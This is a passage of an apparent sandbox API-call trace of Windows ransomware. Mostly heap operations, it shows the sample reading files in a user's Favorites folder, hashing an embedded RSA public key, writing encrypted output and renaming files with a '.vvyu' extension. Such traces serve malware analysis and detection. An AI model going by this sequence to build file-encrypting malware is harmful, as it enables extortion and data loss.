(HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a18 [0189.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399b8 [0189.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399d0 [0189.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399a0 [0189.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a30 [0189.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0189.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a00 [0189.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399e8 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a48 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399e8 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399b8 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39258 | out: hHeap=0x6a0000) returned 1 [0189.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.511] WriteFile (in: hFile=0x584, lpBuffer=0x751d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x751d68*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.512] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.512] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.513] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.514] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.514] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.514] CloseHandle (hObject=0x584) returned 1 [0189.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0189.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.516] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn sports.url.vvyu")) returned 1 [0189.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.520] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.522] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0189.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0189.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.523] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0189.523] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.525] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.525] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.527] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.527] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.529] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.529] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.529] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.530] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.530] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.530] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.531] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.531] GetLastError () returned 0x0 [0189.531] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.531] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.531] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.531] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.531] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.531] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39258 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39988 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d392a0 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399a0 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399d0 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a30 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399e8 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.533] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a30 [0189.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0189.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399e8 [0189.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d399d0 [0189.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0189.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0189.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 